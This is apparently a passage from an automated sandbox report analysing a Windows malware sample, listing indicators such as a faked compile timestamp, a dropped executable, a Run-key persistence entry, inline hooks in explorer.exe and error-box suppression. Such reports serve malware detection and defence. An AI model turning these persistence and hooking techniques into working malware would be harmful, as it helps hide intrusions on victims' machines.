          Source: Binary string: wntdll.pdb source: ewuTygg1Bw.exe, 00000002.00000002.478030527.0000000001980000.00000040.00000001.sdmp, cscript.exe, vgaot707b.exe, 00000012.00000002.836063194.00000000011D0000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdb source: vgaot707b.exe, 00000012.00000002.841745449.0000000002E10000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: vgaot707b.exe, 00000012.00000002.841745449.0000000002E10000.00000040.00000001.sdmp
          Source: Binary string: cscript.pdb source: ewuTygg1Bw.exe, 00000002.00000002.479921865.0000000003590000.00000040.00000001.sdmp
          Source: Binary string: ServiceHost.pdbh/~/ p/_CorDllMainmscoree.dll source: ewuTygg1Bw.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000002.862871028.0000000005FE0000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xB94769C7 [Mon Jul 2 14:31:35 2068 UTC]
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041786D push eax; iretd 2_2_00417872
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00417AB5 push ebp; iretd 2_2_00417AB6
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_004166C2 push esp; retf 2_2_004166D6
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041C6C5 push eax; ret 2_2_0041C718
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_00407773 push cs; ret 2_2_0040777A
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041C77C push eax; ret 2_2_0041C782
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041C712 push eax; ret 2_2_0041C718
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeCode function: 2_2_0041C71B push eax; ret 2_2_0041C782
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0481DE2D push ecx; ret 6_2_0481DE40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DB7AB5 push ebp; iretd 6_2_02DB7AB6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DB786D push eax; iretd 6_2_02DB7872
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBC6C5 push eax; ret 6_2_02DBC718
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBD632 push 813536D0h; iretd 6_2_02DBD637
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBC77C push eax; ret 6_2_02DBC782
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DA7773 push cs; ret 6_2_02DA777A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBC71B push eax; ret 6_2_02DBC782
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_02DBC712 push eax; ret 6_2_02DBC718
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041786D push eax; iretd 18_2_00417872
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00417AB5 push ebp; iretd 18_2_00417AB6
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_004166C2 push esp; retf 18_2_004166D6
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041C6C5 push eax; ret 18_2_0041C718
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_00407773 push cs; ret 18_2_0040777A
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041C77C push eax; ret 18_2_0041C782
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041C712 push eax; ret 18_2_0041C718
          Source: C:\Program Files (x86)\Iobk\vgaot707b.exeCode function: 18_2_0041C71B push eax; ret 18_2_0041C782
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85104042962
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85104042962

          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Iobk\vgaot707b.exeJump to dropped file

          Source: C:\Windows\SysWOW64\cscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CX6HZJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CX6HZJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x23 0x38
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ewuTygg1Bw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX